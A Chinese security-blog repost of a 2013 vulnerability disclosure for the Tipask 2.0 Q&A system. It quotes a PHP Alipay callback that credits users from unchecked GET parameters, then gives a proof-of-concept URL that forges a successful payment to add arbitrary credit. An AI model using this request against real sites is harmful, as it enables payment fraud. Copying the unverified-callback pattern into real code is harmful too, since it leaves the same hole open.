记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

Tipask 2.0 任意充值

2013-09-23 23:25
系统未检查传入参数的有效性
 

function onaliapyback() {

if ($_GET['trade_status' ] == 'TRADE_SUCCESS') {

$credit2 = $_GET[ 'total_fee'] * $this->setting['recharge_rate' ];

$this->credit($this-> user['uid' ], 0, $credit2, 0, "支付宝充值");

$this->message( "充值成功" , "user/score" );

} else {

$this->message( "服务器繁忙,请稍后再试!" , 'STOP' );

}

}

 

直接传入total_fee既可
漏洞证明:
/?ebank/aliapyback.html&trade_status=TRADE_SUCCESS&total_fee=99
 
知识来源: www.2cto.com/Article/201309/245724.html

阅读:67321 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“Tipask 2.0 任意充值”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云